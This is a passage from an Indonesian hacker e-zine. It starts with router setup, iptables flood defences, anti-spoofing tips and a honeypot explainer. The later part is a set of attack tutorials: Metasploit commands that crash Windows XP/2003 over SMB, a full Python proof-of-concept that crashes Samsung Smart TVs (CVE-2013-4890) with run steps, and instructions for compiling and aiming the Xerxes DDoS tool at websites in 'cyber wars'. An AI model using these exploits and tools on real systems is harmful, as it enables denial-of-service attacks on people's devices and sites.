o Old Passwrod : defaultnya admin
o New User Name : masukan username yg baru
o New Password : Masukan Password yg baru
o Confirm New Password : masukan lagi password yg baru
o lalu click save, jgn lupa reboot AP
8. selesai AP direboot, ketik 192.168.1.111 pada address bar browser, masukan
username and password yg baru qt ganti tadi.....hihihih
9. Untuk menambahkan pengguna baru, click Wireless --> Mac Filtering --> Add
New..SS-nya d bawah ini:
45e-ZIT #Vol 2 - Networking
lalu qt dihadapkan pada tampilan berikut :
o MAC ADDRESS : masukan mac address calon pengguna
o Description : namai pengguna baru, misal JIN lalu click save
yup...akhirnya selesai juga...hihihhii
Quote: settingan berbeda-beda, tergantung dari jenis AP-nya
./regards
Mavis Vermilion
46e-ZIT #Vol 2 - Networking
Security > Mencegah Serangan Ping Flooding Dengan Iptables
heuheu Salam Backtrackers
jumpa lagi nih ye,,
ok langsung saja, sesuai judulnya kali ini Bifi mau share cara Mencegah Serangan Ping
Flooding Dengan Iptables,,,, nah apa itu iptables,,,
ne penjelasannya :
iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk
melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana
digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur
semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer,
ataupun traffic yang sekedar melewati komputer kita.
dan ping flooding : Software ini hanya dijalankan di Windows dan menggunakan System
PING dan ICMP Protocol yang memungkinkan pengiriman paket dengan cepat. Korban dari
ping flood ini antara lain modem, windows, Linux, router, dan server. Semua sistem operasi
dan mesin dijaringan komputer yang memiliki IP address bisa diserang tanpa terkecuali. Efek
dari ping flood ini, yaitu aktifitas komputer korban yang meningkat serta traffic jaringan
komputer penuh.
nah udah jelas apa belum...?? ok udah ngerti kan. langsung aja yah...
#Lets Rock
buka editor kaka, terus ketikan kalimat-kalimat cinta di bawah ini...
1. Mencegah paket Syn Flood Attack
Buat sebuah file bernama closesyn.sh atau apalah terserah kaka, yang isinya sebagai berikut
untuk mencegah serangan syn flood
Code:
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket syn yang dicurigai jahat
iptables -N synjahat
iptables -A INPUT -p tcp --syn -j synjahat
iptables -A synjahat -m limit --limit 1/s --limit-burst 3 -j ACCEPT
iptables -A synjahat -j DROP
trus jalankan scriptnya, kayak gini
zbyte@bt:~# sh closesyn.sh
47e-ZIT #Vol 2 - Networking
2. Mencegah Ping Flood attack
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah
serangan ping flood
Code:
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket ping(icmp) yang dicurigai jahat
iptables -N pingjahat
iptables -A INPUT -p icmp -j pingjahat
iptables -A pingjahat -m limit --limit 1/s --limit-burst 2 -j ACCEPT
iptables -A pingjahat -j DROP
jalankan scriptnya, contoh
zbyte@bt:~#sh closeping.sh
keterangan syntax iptables yang Zbyt3 pake
-F (–flush) = Mengosongkan aturan pada sebuah chain
-X (–delete-chain) = Menghapus rantai yang disebutkan
-N (–new-chain) = Membuat rantai baru
-P (–policy) = Membuat kebijakan default pada sebuah rantai
-p (–protocol) = Mengecek tipe protokol tertentu. Tanda inverse(!) berarti kecuali. Misalnya
protocol ! tcp berarti kecuali tcp
-A (–append) = Menambah aturan pada akhir rantai sehingga akan dieksekusi terakhir
-m (multiport –source-port) = Mendefinisikan port atau port range lebih dari satu
-j (–jump) = Perlakuan yang diberikan terhadap paket-paket yang memenuhi kriteria.
Setelah perintah ini ada beberapa opsi yaitu:
ACCEPT: akan mengijinkan paket
DROP: akan menolak paket
REJECT: akan menolak paket
nah untuk lebih jelasnya tentang iptables kunjungi :
https://help.ubuntu.com/community/IptablesHowTo or
http://andreslinuxer.wordpress.com/2010/...-iptables/
mungkin itu saja yang bisa Bifi share malam ini....
pegel ni tangan...
sekian dan terima kasih....
./regards
Bifi
48e-ZIT #Vol 2 - Networking
Security > Mencegah Serangan ARP, DNS/DHCP Spoofing & SSLstrip
Oke Langsung Saja…
1. Pencegahan ARP, DNS/DHCP Spoofing
Mengubah ARP komputer kita dari dinamyc ke static caranya :
* Untuk Windows :
masuk ke menu "Run" ketik "cmd" setelah muncul layarhitam (konsole ) ketik "getmac"
untuk melihat MACADDRES Dan "ipconfig" untuk melihat ip addres komputer anda
Misalnya: MACADDRES yang anda punya"18:f4:6a:75:3e:cd" dan Ip addres anda
192.168.88.7. langakah selanjutnya Mengubah ARP Anda menjadi static..
Perintahnya : "arp -s [Ip_Addres ] [MAC_Anda]"
Jadi seperti ini: "Arp -s 192.168.88.7 18:f4:6a:75:3e:cd"
* Untuk Linux :
Buka konsole (terminal) ketik "macchanger -s wlan0" untuk menampilkan MACADDRES
yang anda miliki,ingat..!! "sesuaikan device wireless yang anda gunakan" kalau saya "wlan0"
Misalnya :MACADDRES anda "07:f4:6a:71:3e:ce" . Langkah selanjutnya Mengubah ARP anda
Menjadi Static
Perintahnya:"arp -i wlan0 -s 192.168.88.7 07:f4:6a:75:3e:ce"
2. Pencegahan SSLstrip
Serangan MITM dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna
untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan
http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https.
Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena
serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman
dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di
URL anda bila ingin mengakses situs yang sensitif. misalnya twitterl,ymail,facebook,paypal
dll
49e-ZIT #Vol 2 - Networking
Melakukan Ping terhadap website yang anda ingin kunjungi
contoh :
root@assock:~#ping http://www.twitter.com
PING 10.0.18.76 (10.0.18.76) 56(84) bytes of data.
64 bytes from 10.0.18.76: icmp_seq=1 ttl=64 time=0.063 ms
64 bytes from 10.0.18.76: icmp_seq=2 ttl=64 time=0.051 ms
64 bytes from 10.0.18.76: icmp_seq=3 ttl=64 time=0.050 ms
64 bytes from 10.0.18.76: icmp_seq=4 ttl=64 time=0.047 ms
64 bytes from 10.0.18.76: icmp_seq=5 ttl=64 time=0.053 ms
64 bytes from 10.0.18.76: icmp_seq=6 ttl=64 time=0.050 ms
hasil ping di atas menunjukan bahwa DNS anda telah di alihkan ke Ip 10.0.18.76 yang bukan
Real addres Facebook
ok mungkin bisa membantu agar teman-2 tidak menjadi korban...!!!
./regards
shockw4f3
50e-ZIT #Vol 2 - Networking
Security > Apa Itu Honeypot ?
Honeypot ? apa itu ? apa fungsinya ? kenapa tiba-tiba nongol di e-ZIT ?
Yosh, e-ZIT menulis Thread ini berdasarkan request dari teman-teman ZIT Divisi Networking,
nah berikut ini sedikit penjelasan mengenai “Apa Itu Honeypot”
Sejarah
Ada beberapa definisi honeypot yang disampaikan oleh beberapa peneliti honeypot pada
makalah sistem kemanan yang mereka buat maupun dari halaman web. Menurut Lance
Spitzner, seorang arsitek sistem keamanan Sun Microsystems, ”A honeypot is security
resource whose value lies in being probed, attacked, or compromised.” Definisi ini menjadi
acuan beberapa makalah lainnya. Dari definisi itu dapat diambil kesimpulan bahwa
honeypot baru dikatakan suatu sistem keamanan jika honeypot tersebut disusupi, diserang,
atau dikendalikan oleh penyerang. Ada juga seorang insinyur berkebangsaan Swiss bernama
Reto Baumann menyikapi interpretasi yang diberikan oleh Lance Spitzner. Menurut
Baumann melalui tugas akhir diplomanya, ” A honeypot is a resource which pretends to be a
real target. A honeypot is expected to be attacked or compromised. The main goals are the
distraction of an attacker and the gain of information about an attack and the attacker.Jadi
menurut Baumann, honeypot adalah sebuah sumber daya sistem keamanan yang dibuat
sebagai tujuan utama penyerang yang sebenarnya merupakan sistem yang palsu untuk
menjebak penyerang. Sistem honeypot biasanya hanya sebuah sistem yang dihubungkan
dengan jaringan produktif, atau sistem yang asli, yang ada dengan tujuan untuk menjebak
penyerang.
Konsep serupa honeypot (sebelumnya belum diberi istilah seperti itu) dipercaya sudah
cukup lama ada, walaupun tidak ada literatur yang membahasnya sebelum tahun 1990.
Tahun 1990 Clifford Stoll menerbitkan buku The Cuckoo’s Egg, yang lebih mirip
cerita detektif. Penerbitnya Pocket Books, yang lebih dikenal dengan novel. Inilah
penerbitan pertama yang menguraikan konsep honeypot. Buku ini menceritakan kejadian
sesungguhnya selama periode sepuluh bulan di tahun 1986-1987. Stoll adalah astronom
pada Lawrence Berkeley Lab yang menjadi admin berbagai komputer untuk komunitas
astronom. Selisih akuntansi senilai 75 sen membuatnya menyadari akan adanya hacker
bernama Hunter, yang telah menyusup ke dalam sistem.
Bukannya menutup account penyusup ini, Stoll malah membiarkannya berada dalam sistem,
agar dapat mempelajarinya lebih jauh dan memburunya. Tanpa disadari penyerang, Stoll
menyiapkan direktori SDINET (Strategic Defence Initiave Network) dan mengisinya dengan
file-file yang pura-pura berisi berbagai file keuangan dan rahasia negara. Hacker ini ternyata
tidak tertarik pada file-file keuangan. Makalah teknis pertama mengenai honeypot terbit
51e-ZIT #Vol 2 - Networking
pada tahun 1990 itu juga, tulisan Bill Cheswick berjudul ‘An Eve-ning with Berfeld in Which a
Cracker Is Lured, Endured and Studied’ . Berbeda dengan yang pertama, Cheswick memang
menyiapkan suatu sistem yang memang untuk diserang, menjadikannya kasus pertama dari
honeypot yang sesungguhnya. Pada makalah ini Cheswick bukan saja membahas cara
membangun dan menggunakan honeypot, melainkan juga menceritakan bagaimana
seorang hacker Belanda dipelajari sewaktu dia menyerang dan menguasai sistem. Cheswick
pertama-tama membangun suatu sistem dengan beberapa kelemahan (termasuk Sendmail)
untuk mendapatkan ancaman apa saja yang ada dan bagaimana cara kerjanya. Tujuannya
bukanlah untuk menangkap orang tertentu, melainkan untuk mempelajari kegiatan
membahayakan apa saja yang bisa terjadi terhadap network dan sistemnya. Cheswick
menciptakan suatu lingkungan terkontrol yang disebutnya sebagai jail (ia tidak
menyebutnya sebagai honeypot), yang mengurung kegiatan sang penyerang. Hacker
Belanda dengan nickname Berfeld ini memasuki sistem dengan memanfaatkan kelemahan
pada Sendmail sampai mendapatkan kendali terhadap sistem. Secara umum, honeypot
dapat didefinisikan sebagai sebuah sumber daya sistem informasi dimana nilai guna dari
sumber daya tersebut justru berdasar kepada terdeteksinya kasus penggunaan yang tidak
terotorisasi atau tidak diperbolehkan secara hukum dari sumber daya tersebut. Atau dengan
kata lain, honeypot adalah sebuah sumber daya yang bersifat seakan-akan target yang
sebenarnya, yang dengan sengaja disediakan untuk diserang atau diambil alih. Oleh karena
itu, honeypot akan diamati, diserang bahkan dieksploitasi oleh penyerang atau penyusup.
Tujuan utama dari honeypot ini adalah untuk mengumpulkan informasi dari suatu serangan
dan penyerang yang melakukannya. Intruder atau penyerang merupakan istilah umum yang
diberikan untuk menggambarkan seseorang yang berusaha untuk masuk ke dalam sistem
dalam arti berusaha menggunakan sistem dimana mereka tidak memiliki autorisasi atau
menggunakan sistem untuk maksud yang menyimpang di luar hak-hak yang mereka miliki.
Tipe Honeypot
Honeypot dibagi menjadi dua tipe dasar, yaitu production honeypot dan research honeypot.
Tujuan utama dari production honeypot adalah untuk membantu mengurangi resiko
keamanan jaringan pada sebuah organisasi. Production honeypot memberikan suatu nilai
tambah bagi keamanan jaringan dari suatu organisasi. Tipe kedua, research honeypot,
adalah honeypot yang didesain untuk mendapatkan informasi mengenai aktivitas-aktivitas
dari komunitas penyerang atau penyusup. Research honeypot tidak memberikan suatu nilai
tambah secara langsung kepada suatu organisasi, melainkan digunakan sebagai alat untuk
meneliti ancaman-ancaman keamanan yang mungkin dihadapi dan bagaimana cara untuk
melindungi diri dari ancaman tersebut.
52e-ZIT #Vol 2 - Networking
Klasifikasi Honeypot
Honeypot dapat diklasifikasikan berdasarkan pada tingkat interaksi yang dimilikinya. Tingkat
interaksi dapat didefinisikan sebagai tingkat aktivitas penyerang atau intruder di dalam
sistem yang diperbolehkan maka semakin tinggi pula tingkat interaksi honeypot.
LOW INTERACTION HONEYPOT
Low-interaction honeypot merupakan honeypot dengan tingkat interaksi honeypot, yaitu
honeypot yang didesain untuk mengemulasikan service (layanan) seperti pada server yang
asli. Penyerang hanya mampu memeriksa dan terkoneksi ke satu atau beberapa port.
Kelebihan low-interaction honeypot yaitu:
 Mudah di install, dikonfigurasi, deployed, dan dimaintain
 Mampu mengemulasi suatu layanan seperti http, ftp, telnet, dsb.
 Difungsikan untuk deteksi serangan, khususnya pada proses scanning atau
percobaanpembukaan koneksi pada suatu layanan.
Kekurangan low-interaction honeypot :
 Layanan yang di berikan hanya berupa emulasi, sehingga penyerang tidak dapat
berinteraksi secara penuh dengan layanan yang diberikan atau sistem operasinya
secara langsung
 Informasi yang bisa kita dapatkan dari penyerang sangat minim.
 Apabila serangan dilakukan oleh “real person” bukan “automated tools” mungkin
akan segera menyadari bahwa yang sedang dihadapi merupakan mesin honeypot,
karena keterbatasan layanan yang bisa diakses.
MEDIUM INTERACTION HONEYPOT
Kelebihannya Medium Interaction Honeypot:
 Memiliki kemampuan yang lebih banyak untuk berinteraksi dengan penyerang
dibandingkan low-interaction honeypot namun tidak sebanyak high-interaction
honeypot.
 Emulasi layanan dapat ditambahkan berbagai macam fitur tambahan sehingga
seakanakan penyerang benar-benar sedang berinteraksi dengan layanan yang
sebenarnya.
 Contoh: script untuk mengemulasikan IIS web server dengan berbagai macam
informasi tambahan yang menyertai web server tersebut sehingga benar-benar
terlihat seperti aslinya, atau pun juga membuat emulasi IIS yang dapat berinteraksi
53e-ZIT #Vol 2 - Networking
dengan suatu jenis worm, sehingga kita bisa mendapatkan payload dari worm
tersebut untuk dianalisis selanjutnya.
 Contoh: menggunakan jail atau chroot, yaitu membangun sistem operasi virtual pada
partisi yang terpisah didalam sistem operasi yang sebenarnya dimana sistem operasi
virtual tersebut sepenuhnya di kontrol oleh sistem operasi yang sebenarnya, cara ini
dapat memberikan suasana sistem operasi yang sesungguhnya bagi penyerang.
Kekurangan Medium Interaction Honeypot :
 Sistem tersebut cukup kompleks.
 Memerlukan usaha lebih untuk maintain dan deploy sistem tersebut sehingga akses
yang diberikan kepada penyerang benar-benar terjamin tingkat keamanannya
namun tetap dapat memberikan suasana sistem yang nyata bagi penyerang sehingga
penyerang tersebut tidak curiga bahwa aktivitasnya sedang di monitor.
HIGH INTERACTION HONEYPOT
Pada high-interaction honeypot terdapat sistem operasi dimana penyerang dapat
berinteraksi langsung dan tidak ada batasan yang membatasi interaksi tersebut.
Menghilangkan batasan-batasan tersebut menyebabkan tingkat risiko yang dihadapi
semakin tinggi karena penyerang dapat memiliki akses root. Pada saat yang sama,
kemungkinan pengumpulan informasi semakin meningkat dikarenakan kemungkinan
serangan yang tinggi. Dikarenakan penyerang dapat berinteraksi secara penuh dengan
sistem operasi, maka apabila si penyerang telah mendapat akses root.
Kelebihannya :
 Penyerang berinteraksi langsung dengan sistem yang nyata termasuk diantaranya
sistem operasi, network, hingga layanan yang diberikan ( web, ssh service, mail
service, dll )
 Umumnya dibangun suatu sistem khusus dengan topologi yang telah dipersiapkan.
 Sistem tersebut biasanya terdiri dari berbagai macam implementasi dari teknologi
keamanan yang banyak digunakan untuk melindungi suatu sistem, seperti firewall,
IDS/IPS, router, dll.
 Target serangan berupa sistem operasi sebenarnya yang siap untuk berinteraksi
secara langsung dengan penyerang.
Kekurangannya :
 Perencanaan dan implementasi sistem jauh lebih rumit dan dibutuhkan banyak
pertimbangan.
54e-ZIT #Vol 2 - Networking
 High-interaction honeypot bersifat tidak efisien karena membutuhkan pengawasan
berkala.
 Apabila telah diambil alih oleh penyerang maka honeypot tersebut dapat menjadi
ancaman bagi jaringan yang ada.
SEJARAH WIRELESS HONEYPOT
Kemajuan teknologi honeypot mulai terlihat ketika Kevin Poulsen pada tahun 2002
mempublikasikan penelitiannya, Wi-Fi Honeypots a New Hacker Trap , penelitian Poulsen ini
dianggap beberapa pihak sebagai teknologi wireless honeypot yang pertama. Suatu tim
peneliti, WISE ( Wireless Information Security Experiment ) pada tahun 2002 didirikan oleh
SAIC ( Science Applications International Corporation ) di Washington DC, Amerika Serikat.
Tim peneliti ini meneliti celah keamanan jaringan wireless pada waktu itu, tim tersebut
mendapati bahwa kebanyakan jaringan wireless pada saat itu sangat mudah untuk disusupi
dan sangat terbuka. Jenis ancaman yang ditemukan adalah akses yang tidak terotorisasi,
penggunaan jaringan wireless yang ilegal, mendengarkan proses komunikasi pada wireless
secara ilegal ( eavesdropping ). Ancaman kemanan tersebut merupakan ancaman keamanan
yang paling utama dan paling sering terjadi saat ini. Pada akhir 2002, sebuah organisasi
bernama Tenebris mempublikasikan hasil penelitian mereka, yaitu pengumpulan data dari
wireless honeypot yang mereka implementasikan di Ottawa ( Canada ) dan menyimpulkan
bahwa sangat banyak terjadi aktivitas war driving saat itu dan apa saja yang sering menjadi
target serangan para penyerang di jaringan wireless. Selanjutnya, Tenebris melanjutkan riset
mereka di sekitar kota London lalu menuju Adelaide, South Australia.
SKENARIO SERANGAN PADA JARINGAN WIRELESS
Dari beberapa penelitian sebelumnya, ada suatu bentuk pola skenario serangan yang umum
terjadi pada sistem keamanan wireless. Setidaknya ada tiga pola skenario serangan, yaitu:
 Serangan yang sebenarnya ditujukan ke jaringan kabel ( LAN ) dengan memakai
jaringan wireless sebagai media untuk menyusup ke LAN.
 Serangan yang langsung ditujukan kepada pengguna jaringan wireless. Jenis
serangan ini menyerang perangkat wireless user.
 Serangan yang ditujukan ke infrastruktur jaringan wireless secara keseluruhan. Jenis
serangan ini biasanya bertujuan mengambil alih akses penuh jaringan wireless.
ARSITEKTUR WIRELESS HONEYPOT
Secara umum arsitektur wireless honeypot yang akan diimplementasikan adalah sebagai
berikut.
 Wireless Access Point ( WAP ) sebagai media prasarana jaringan wireless.
55e-ZIT #Vol 2 - Networking
 Wireless Client ( WC ) merupakan pihak pengguna jaringan wireless ( user ).
 Wireless Monitor ( WMON ) sebagai perangkat yang merekam trafik jaringan.
 Wireless Data Analysis ( WDA ) berfungsi menganalisis trafik dari WMON
 Wired Instructure ( WI ) merupakan infrastruktur LAN.
Saya informasikan kepada pembaca, jika anda membeli perangkat telekomunikasi,
sebaiknya yang sudah di sertifikasi atau yang sudah bersertifikat resmi dari postel, untuk
menjaga agar anda tidak berurusan dengan pihak yang berwajib. Dan perangkat yang sudah
di sertifikasi tentunya sudah lulus pengujian di balai uji, sehingga mutu dan kualitasnya
terjamin.
Penempatan Honeypot
 Eksternal Placement, honeypot diposisikan berhadapan langsung dengan internet,
jadi tidak ada firewall di depan honeypot.
 Internal Placement, honeypot tidak terkoneksi langsung ke internet tetapi berada di
antara firewall dan koneksi internet.
56e-ZIT #Vol 2 - Networking
 DMZ Placement, honeypot diposisikan dalam firewall DMZ (demilitarized zone).
Biasanya digunakan pada sebuah perusahaan besar dengan sistem jaringan yang
besar.
Sumber :
 Seminar Security Jaringan (khususnya pembicaranya, lupa namanya, tapi
senyumnya… MANTAB )
 NeoTek Vol. V – No. 1
Referensi > http://bisnistypeapproval.wordpress.com/2009/05/01/jaringan-honeypot/
Yarp, gemana ? udah pada tau “Apa Itu Honeypot” kan, tertarik untuk mencobanya atau
menerapkannya ?
Kalo udah di coba jangan lupa di share yah…..
Special Thank.z To > Keygen, Surtua, Gunners, Thektor, Rulex, Error and All Crew ZIT
Networking Division
./regards
e-ZIT
57e-ZIT #Vol 2 - Networking
Network Attack > DoS Attack With Metasploit
Hai-Hai . . .
Salam Bcktrackers Jumpa lagi sama saya Bifi yang Cool . . . wkwkw
Yups, kali Bifi mau share neh, sesuai kayak judul di atas, DOS With Metasploit, buat yang
biasa jadi penjahat di komputer pasti udah tau kan apa itu metasploit...
ok neh penjelasannya
DoS (Denial of Service) > adalah jenis serangan terhadap sebuah komputer atau server di
dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh
komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan
benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses
layanan dari komputer yang diserang Țersebut..
Metasploit > Metasploit merupakan sofware security yang sering digunakan untuk menguji
coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu
sistem...
sekian thread saya, makasih,,, wkwkwkw eh belum belum,,,
lanjoot,,
Okok,, Sebelum Melakukan Aksi Kali Ini, Mending Kita Liad Persyaratannya Dolo... neh,
DoS hanya bisa dilakukan ke Seri Windows yang tertera dibawah.
Windows 7 dan Vista dan Windows 8 belum/tidak bisa.
Code :
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Profesional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Emas 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Versi 2003 SP1
58e-ZIT #Vol 2 - Networking
Microsoft Windows XP 64-bit Edition 2003 Versi
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Itanium
Microsoft Windows Server 2003 Enterprise Edition SP1 Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Itanium
Microsoft Windows Server 2003 Datacenter Edition SP1 Itanium
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 SP4 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4
siapkan alat dan bahan...
1. Sebuah PC/Laptop Yang Udah Terkoneksi
2. Nmap Untuk Scan Traget
3. Metasploit
4. Korban
Nb > Ini Hanya bisa di lakukan pada 1 jaringan yang sama . . . alias ngana baconnect di situ,
korban juga di situ kabawa...
step 1...
scan target with nmap doloo,
Scan dengan nmap, untuk cari tau OS Korban n cari yang port 445 yang terbuka...
kayak gini
59e-ZIT #Vol 2 - Networking
commandnya ada disini,
http://forum.codernate.org/thread-331.html
silahkan di coba..
Ingat, OSnya Harus Cocok Kayak Daftar Yang Di Atas...
klo udah dapet ip korbannya, langsung aja deh buka tools metasploitnya,,
ne letak toolsnya
klik ikon backtrack lalu pilih,
backtrack > explotation > network explotation tools > metasploit framework > klik
msfconsole
setelah di consolenya ketik perintah berikut
Code:
- msf > use dos/windows/smb/ms06_063_trans
- msf auxiliary(ms06_063_trans) > set LPORT 445 # setting port ke 445
- msf auxiliary(ms06_063_trans) > set RHOST IP_TARGET # ip address target
bro
- msf auxiliary(ms06_063_trans) > run
60e-ZIT #Vol 2 - Networking
kayak gini
kalo udah maka hasilnya akan seperti ini, kebetulan temen Bifi setelah di bujuk dengan Big
Cola 1 botol dia mau jadi korbannya,,
kasian...
61e-ZIT #Vol 2 - Networking
neh hasilnya, langsung di capture . . .
Yap, target langsung mengalami bluescreen :)
nah gitu aja...
ne thread Bifi specialin buat temen Bifi yang gak mau disebut namanya, thank.z zob udah
mau laptopnya dijadiin korban,,,
n buat yang make OS untuk Hacking or Hoby ngumpul tools hacking, di pake toolsnya bukan
di jadiin hiasan . . .
Terakhir Jangan Males googling Yah...
referensi > forum.id-backtrack.com
./regards
Bifi
62e-ZIT #Vol 2 - Networking
Network Attack > POC Samsung Smart TV Denial of Service (DoS) Attack
Yups, setelah beberapa bulan miskin thread, akhirnya dapat juga,,,
berawal dari searching-searching di mbah gugel, eh nemu juga...
wkwkw, seperti judul di atas, kali ini bifi mau kasih tau POCnya,
Step 1...
Copas script python dibawah ini...
Code:
#!/usr/bin/python
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a
long HTTP GET request
# As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest
firmware :)
import httplib
import sys
import os
print
" ************************************************************************
***************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.comn"
print " Exploit: Denial of Service (DoS) attackn"
print " Description:n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by
sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :)n"
print
" ************************************************************************
***************n"
# Sends the payload
print " Sending the malicious payload...n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()
# Checks the response
print " Checking the status... (CTRL+Z to stop)n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print " Target down!n"
63e-ZIT #Vol 2 - Networking
Atau ambil saja disini http://www.exploit-db.com/exploits/27043/
save dengan extensi .py .. terserah namanya apa, bifi.py kek, gula.py kek,,, whatever you
want bro....
jangan lupa beri file permissionnya dulu
ketik chmod +x namafile.py + enter
contoh :
root@bifi:~# chmod +x gula-gula.py
#Step 2
Usahakan kita berada dalam 1 jaringan yang sama,, dalam hal ini masih via LAN untuk versi
WiFi bifi masih belum paham a.k.a masih di cari POC nya,,,,
yarp kalo udah scan dulu IP Target bisa make NMAP or apalah,,,,
setelah target di dapat,,, misalkan IP targetnya 200.100.1.22, nah tinggal jalankan
scriptnya....
#Step 3
untuk jalankan scriptnya, cukup open terminal masuk ke directory script.py yang tadi kita
udah simpan, lalu ketik ./namascript.py IP_TARGET
contoh :
root@bifi:~# ./gula-gula.py 200.100.1.22 + enter
daaaan, tango down,, check dengan ping IP Target, jika uncreable/timeout berarti target
down,,,,,
Nah mengapa target down,,,???
itu terjadi karena port TCP/5600 pada Samsung Smart TV tersebut mengalami crash, karena
script tersebut mengirim "HTTP GET request" yang panjang atau sangat banyak.. sehingga
TV dipaksa untuk restart a.k.a reboot... neh fungsi yang membuat port tersebut crash
Code:
conn = httplib.HTTPConnection(sys.argv[1],5600)
yups mungkin itulah sedikit POC dari cara DoS Samsung TV,,,, Script ini masih work di segala
jenis SAMSUNG SMART TV.....
Tested On : Samsung plasms TV PS50C7700.
64e-ZIT #Vol 2 - Networking
nah next thread nanti Bifi akan jelaskan POC untuk mendapatkan full access remote pada
SAMSUNG SMART TV, hingga kita bisa memantau semua aktivitas pemilik TV tersebut alias
"we keep the eyes and ears in the living room"
TO BE CONTINUED
Referensi
http://www.exploit-db.com/exploits/27043/
http://www.infosecurity.com
http://securityaffairs.co
http://www.youtube.com/watch?v=U-R2epNnU...r_embedded
Special Thanks To
Ivan Tabrakan Untuk Kuotanya and My Brother Ical yang udah menjadi penerjemah,
hahahaha gak perlu buka gugel translate lagi kan udah ada ical translate
./regards
Bifi
65e-ZIT #Vol 2 - Networking
Network Attack > How To Use Xerxes DDoS Tools
Yups Malam Semuanya,,
jumpa lagi sama saya Bifi yang aneh dan gemana gitu...
okok, bagi kaka-kaka para peserta #OP atau yang suka ngikutin perang cyber, entah demi
membela negara, agama, atau memang dendam sama website target, yups sesuai judul
diatas kali ini Bifi mau share tentang cara penggunaan Xerxes DDoS Tool,, nah yang belum
tau tentang tools yang 1 ini, neh Bifi kasih tau Xerxes itu nama toolsnya wkwkwkkw, yup
isinya berupa script-script gak masuk akal make bahasa C, nah tools ini digunakan oleh Th3
J3st3r untuk takedown situs-situs yang jadi target mereka....
nah kenapa Bifi jadiin ini thread karena, Bifi Udah puyeng nyari tutornya di mbah gugel tapi
nggak ketemu cara gunain tuh tools, yang ada hanya scriptnya doang,,,,
okeh langsung aja yah, pertama kita donlod atau copas dulu scriptnya disini
http://pastebin.com/aWZMbjSU
next,,
kalo udah, ganti extensinya dengan "C" contoh xerxes.txt ganti dengan xerxes.c atau kalo di
copas langsung aja save dengan extensi "c" nya contoh xerxes.c...
yup untuk ngejalaninnya kita harus compile dulu scriptnya,
kalo dilinux nama compilernya g++, itu loh compilernya bahasa C, kalo nggak salah,, dan kalo
belum punya langsung di install aja sekalian, neh comandnya..
sudo apt-get install g++
lanjood,,
nah cara compilenya [untuk linux] gini open terminal ketik g++ namafile -o nama output
filenya
contoh : g++ xerxes.c -o xerxes
kalo untuk windows pake Turbo C, cuman Bifi belum tau cara make nya...
siip, setelah di compile jalankan scriptnya,
masih di terminal linux, ketik ./nama toolsnya [IP Target] [Port]
contoh : ./xerxes 200.100.1.1 80 lalu tekan enter,,, siip tinggal tunggu aja ampe targetnya
mampus...
66e-ZIT #Vol 2 - Networking
